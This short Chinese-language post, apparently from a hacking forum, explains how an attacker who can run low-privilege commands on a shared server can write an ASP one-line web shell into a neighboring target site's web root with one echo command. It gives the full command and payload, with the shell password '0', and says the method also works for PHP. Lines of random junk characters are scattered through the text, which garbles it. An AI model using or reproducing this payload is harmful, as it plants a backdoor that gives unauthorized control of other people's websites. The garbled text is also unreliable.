在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。6 @; |' C. o+ D( Z& y) B- S0 s$ |' F
& s: q9 U8 w/ u, v& N; o; {3 L6 @! m命令格式& L4 |4 b- |0 Z5 ?, U
; S6 W$ A2 @5 i/ O
Echo 语句 >目标站绝对目录
! W; F/ \9 B3 q m: Y2 D: I" a2 y
6 a( C& ~; W* ~" X例如:
" U& b9 x6 `; r; r7 b* c. f
1 q9 t0 L, j+ V/ ]3 H' Q) qecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp, Z1 j2 h/ m5 a9 m+ O
- w( U$ j1 T- P4 W5 Y l
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。4 O4 v* s; r' p! d/ L9 s
|